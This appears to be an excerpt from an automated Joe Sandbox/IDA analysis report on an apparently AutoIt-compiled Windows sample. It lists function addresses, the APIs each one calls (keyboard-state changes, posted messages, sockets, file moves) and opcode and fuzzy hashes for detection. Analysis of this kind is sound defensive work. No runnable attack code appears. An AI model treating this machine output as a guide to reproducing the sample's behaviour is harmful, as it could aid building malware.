                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInit
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2610073882-625585964
                        • Opcode ID: 5d8c9189974e493e7888d1008e76f1f1c22be58f43024fb676e4af130b416329
                        • Instruction ID: 39cdb9ec387d6128aeddd0dc0b598add0e2ff702cde51aaa0a8ea4fa2fcfdfce
                        • Opcode Fuzzy Hash: 5d8c9189974e493e7888d1008e76f1f1c22be58f43024fb676e4af130b416329
                        • Instruction Fuzzy Hash: 959173B1A00219AFDF20CFA5D844FAEB7B8FF89714F108559F615AB281D7709941CFA0
                        Function 009F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 009F125C
                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 009F1284
                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009F12A8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F12D8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F135F
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F13C4
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F1430
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                        • String ID:
                        • API String ID: 2550207440-0
                        • Opcode ID: 624ee61c51f64d08b3aec5b56183f68b71da22c1492e1089d27557822fbe0a8f
                        • Instruction ID: f44e138efc3c78415b85b8bb2fcc3e7f344f2f43351e783fa1faf7b871809fe5
                        • Opcode Fuzzy Hash: 624ee61c51f64d08b3aec5b56183f68b71da22c1492e1089d27557822fbe0a8f
                        • Instruction Fuzzy Hash: 2F919D71A00219DFDB00DF98C885BBEB7B9FF85325F104429EA50EB2A1D774A941CB90
                        Function 0099948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: e74ba7c39bb192cd442d53091a09f195faeb01668c5a206daaf65281230b5923
                        • Instruction ID: ce72e9b4724386fe3999830c1fcbd0025bb4555aa7037845cb05c13667bfbb16
                        • Opcode Fuzzy Hash: e74ba7c39bb192cd442d53091a09f195faeb01668c5a206daaf65281230b5923
                        • Instruction Fuzzy Hash: 34913671D44219EFCF10CFA9C884AEEBBB8FF49320F148459E915B7251D378A942CB60
                        Function 00A03947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00A0396B
                        • CharUpperBuffW.USER32(?,?), ref: 00A03A7A
                        • _wcslen.LIBCMT ref: 00A03A8A
                        • VariantClear.OLEAUT32(?), ref: 00A03C1F
                          • Part of subcall function 009F0CDF: VariantInit.OLEAUT32(00000000), ref: 009F0D1F
                          • Part of subcall function 009F0CDF: VariantCopy.OLEAUT32(?,?), ref: 009F0D28
                          • Part of subcall function 009F0CDF: VariantClear.OLEAUT32(?), ref: 009F0D34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4137639002-1221869570
                        • Opcode ID: 5863b099b8cc54479f35f93127cd6352caecc83f7282e36f70901b073c151938
                        • Instruction ID: 3a68f034b8f20c0d9b0d6eeaea5058c576ffe21a986eafd99b6a69d627cc92d4
                        • Opcode Fuzzy Hash: 5863b099b8cc54479f35f93127cd6352caecc83f7282e36f70901b073c151938
                        • Instruction Fuzzy Hash: 569148756083459FCB04EF64D48096AB7E8BFC9354F14882DF8999B391DB31EE05CB92
                        Function 00A04BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?,?,009E035E), ref: 009E002B
                          • Part of subcall function 009E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0046
                          • Part of subcall function 009E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0054
                          • Part of subcall function 009E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?), ref: 009E0064
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A04C51
                        • _wcslen.LIBCMT ref: 00A04D59
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A04DCF
                        • CoTaskMemFree.OLE32(?), ref: 00A04DDA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 614568839-2785691316
                        • Opcode ID: 2e6911e63a533eecb323922d105ed37442838371529a02afdbb66ad681581a20
                        • Instruction ID: 1ff9a9dd21b1fa7b6f18f9857accd8fb29d7c1ec86478c94dd9a1af2b618be07
                        • Opcode Fuzzy Hash: 2e6911e63a533eecb323922d105ed37442838371529a02afdbb66ad681581a20
                        • Instruction Fuzzy Hash: 829129B1D0021DAFDF14EFA4D891AEEB7B8BF48310F10816AE515A7291EB309E45CF60
                        Function 00A120FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenu.USER32(?), ref: 00A12183
                        • GetMenuItemCount.USER32(00000000), ref: 00A121B5
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A121DD
                        • _wcslen.LIBCMT ref: 00A12213
                        • GetMenuItemID.USER32(?,?), ref: 00A1224D
                        • GetSubMenu.USER32(?,?), ref: 00A1225B
                          • Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
                          • Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
                          • Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A122E3
                          • Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                        • String ID:
                        • API String ID: 4196846111-0
                        • Opcode ID: 67823781cdaf41d8cfd8d4f20bdc5403cf391d63cbd4e00dfe5c73e3717467e0
                        • Instruction ID: 7d2f861b42ef2ad41352ad510eda4664eab65f82f062881e13534e399f2fc032
                        • Opcode Fuzzy Hash: 67823781cdaf41d8cfd8d4f20bdc5403cf391d63cbd4e00dfe5c73e3717467e0
                        • Instruction Fuzzy Hash: 5B716F75A00205AFCB14EFA8C845BEEB7F5EF88320F148459E956EB351D734ED918B90
                        Function 009EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 009EAEF9
                        • GetKeyboardState.USER32(?), ref: 009EAF0E
                        • SetKeyboardState.USER32(?), ref: 009EAF6F
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 009EAF9D
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 009EAFBC
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 009EAFFD
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009EB020
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: ac0457b4d7592f7ad098dece27aae32ab2aca81a050481c6b6ce7261c666b690
                        • Instruction ID: d409124d82289796c2be315928a796bee86c09606663acd538a80c5b2157558c
                        • Opcode Fuzzy Hash: ac0457b4d7592f7ad098dece27aae32ab2aca81a050481c6b6ce7261c666b690
                        • Instruction Fuzzy Hash: 6751AFA06047D53DFB3783368C45BBBBEA95B46304F088989E1E9558E2C398FC88D751
                        Function 009EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(00000000), ref: 009EAD19
                        • GetKeyboardState.USER32(?), ref: 009EAD2E
                        • SetKeyboardState.USER32(?), ref: 009EAD8F
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009EADBB
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009EADD8
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009EAE17
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009EAE38
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: a183f1c04071ec4f96e969b352201de918625c829d5cf4754af77086ddb4f43c
                        • Instruction ID: 0630ed468f727cea1795a14a3476f2e4ed041d7100d607671e60297da19181f5
                        • Opcode Fuzzy Hash: a183f1c04071ec4f96e969b352201de918625c829d5cf4754af77086ddb4f43c
                        • Instruction Fuzzy Hash: A851D1A15047D53DFB3382668C95BBABEAD6F46300F08848CE1D9468E2C294FC88D762
                        Function 009B542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleCP.KERNEL32(009C3CD6,?,?,?,?,?,?,?,?,009B5BA3,?,?,009C3CD6,?,?), ref: 009B5470
                        • __fassign.LIBCMT ref: 009B54EB
                        • __fassign.LIBCMT ref: 009B5506
                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,009C3CD6,00000005,00000000,00000000), ref: 009B552C
                        • WriteFile.KERNEL32(?,009C3CD6,00000000,009B5BA3,00000000,?,?,?,?,?,?,?,?,?,009B5BA3,?), ref: 009B554B
                        • WriteFile.KERNEL32(?,?,00000001,009B5BA3,00000000,?,?,?,?,?,?,?,?,?,009B5BA3,?), ref: 009B5584
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: e5e7ec65b03eb2cfc861b9875dabd16ac5694199e27284094e7e512ba9a1cc47
                        • Instruction ID: 9695fc074a3d171c90828254aebfa5a3669aeeca4e8f83c522114b80cb721805
                        • Opcode Fuzzy Hash: e5e7ec65b03eb2cfc861b9875dabd16ac5694199e27284094e7e512ba9a1cc47
                        • Instruction Fuzzy Hash: 9F510270A00609AFDB20CFA8D985BEEBBF9EF09321F15411AF955E7291D770DA41CB60
                        Function 009A2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 009A2D4B
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 009A2D53
                        • _ValidateLocalCookies.LIBCMT ref: 009A2DE1
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 009A2E0C
                        • _ValidateLocalCookies.LIBCMT ref: 009A2E61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 4593c94286b64bc6f2f3dd6df2839ca3863cd0cde693d5cba0f1514e49878de3
                        • Instruction ID: d93300ed88ee8a44dbd577cdf58f311f6037401ea7c2c8d7ae687bb775c6328b
                        • Opcode Fuzzy Hash: 4593c94286b64bc6f2f3dd6df2839ca3863cd0cde693d5cba0f1514e49878de3
                        • Instruction Fuzzy Hash: EF417134A01209ABCF10DF6CC845A9EBBB9BF86328F148155E8146B392D735EA55CBD0
                        Function 00A010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A0304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
                          • Part of subcall function 00A0304E: _wcslen.LIBCMT ref: 00A0309B
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A01112
                        • WSAGetLastError.WSOCK32 ref: 00A01121
                        • WSAGetLastError.WSOCK32 ref: 00A011C9
                        • closesocket.WSOCK32(00000000), ref: 00A011F9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 2675159561-0
                        • Opcode ID: fe07f190adc204147e978c6c4811091507c2547f66ca15d3940f341b0aeadbbb
                        • Instruction ID: 02af2845d97112b9c598529fd7012f923348100e0760a59ee61d7990c897b8ca
                        • Opcode Fuzzy Hash: fe07f190adc204147e978c6c4811091507c2547f66ca15d3940f341b0aeadbbb
                        • Instruction Fuzzy Hash: 7141C371600208AFDB14DF54D884BEABBE9EF85324F148159F9159B2D1D770ED42CBE1
                        Function 009ECF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ECF22,?), ref: 009EDDFD
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ECF22,?), ref: 009EDE16
                        • lstrcmpiW.KERNEL32(?,?), ref: 009ECF45
                        • MoveFileW.KERNEL32(?,?), ref: 009ECF7F
                        • _wcslen.LIBCMT ref: 009ED005
                        • _wcslen.LIBCMT ref: 009ED01B
                        • SHFileOperationW.SHELL32(?), ref: 009ED061
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                        • String ID: \*.*
                        • API String ID: 3164238972-1173974218
                        • Opcode ID: 1f27cde6e76b02666da86a3b2bd5a1220e3f346abd87c49d79b6edb1eede1acb
                        • Instruction ID: 07204f6299b5ebdf215ab42f33085a38c4d2f4fafbcda1369896342028cc089f
                        • Opcode Fuzzy Hash: 1f27cde6e76b02666da86a3b2bd5a1220e3f346abd87c49d79b6edb1eede1acb
                        • Instruction Fuzzy Hash: EB4166B19452585FDF13EFA5C981BDEB7BDAF48380F0004E6E545EB141EB34AA85CB50
                        Function 00A12DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A12E1C
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A12E4F
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A12E84
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A12EB6
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A12EE0
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A12EF1
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A12F0B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: 2fd14be2e601c332b5a6b9039bddd5f708b59ce434f7541bc1a42dd40080f867
                        • Instruction ID: b568af90b5c60e4434584c0ac608add85464d911b7398b267e0c9bce5599d745
                        • Opcode Fuzzy Hash: 2fd14be2e601c332b5a6b9039bddd5f708b59ce434f7541bc1a42dd40080f867
                        • Instruction Fuzzy Hash: 0431F234684250AFEB21CF98DC84FA53BE5FB8A721F154164F9108B2B1CB75ECA19B41
                        Function 009E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7769
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E778F
                        • SysAllocString.OLEAUT32(00000000), ref: 009E7792
                        • SysAllocString.OLEAUT32(?), ref: 009E77B0
                        • SysFreeString.OLEAUT32(?), ref: 009E77B9
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 009E77DE
                        • SysAllocString.OLEAUT32(?), ref: 009E77EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 270b9738842a3179de6d91afa74c0097793af13f0dcf2287bb99ec82a944faf6
                        • Instruction ID: 1bda2bafbe09fdd40c74fe84c2e702e3c9671c6b6d3817c6a477185ea4853d45
                        • Opcode Fuzzy Hash: 270b9738842a3179de6d91afa74c0097793af13f0dcf2287bb99ec82a944faf6
                        • Instruction Fuzzy Hash: FE21B076608219AFDF11DFE9CC88DFBB3ACEB09364B048425FA05DB150D670DC828761
                        Function 009E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7842
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7868
                        • SysAllocString.OLEAUT32(00000000), ref: 009E786B
                        • SysAllocString.OLEAUT32 ref: 009E788C
                        • SysFreeString.OLEAUT32 ref: 009E7895
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 009E78AF
                        • SysAllocString.OLEAUT32(?), ref: 009E78BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 336241f8a54715e886fb3db3d45af360f5839d05e8f3ead63fc9517dc058fa8e
                        • Instruction ID: 7ed43987119ffb7db4e7fa9b9e2509d5d1b44b18473192e74f71773eda664765
                        • Opcode Fuzzy Hash: 336241f8a54715e886fb3db3d45af360f5839d05e8f3ead63fc9517dc058fa8e
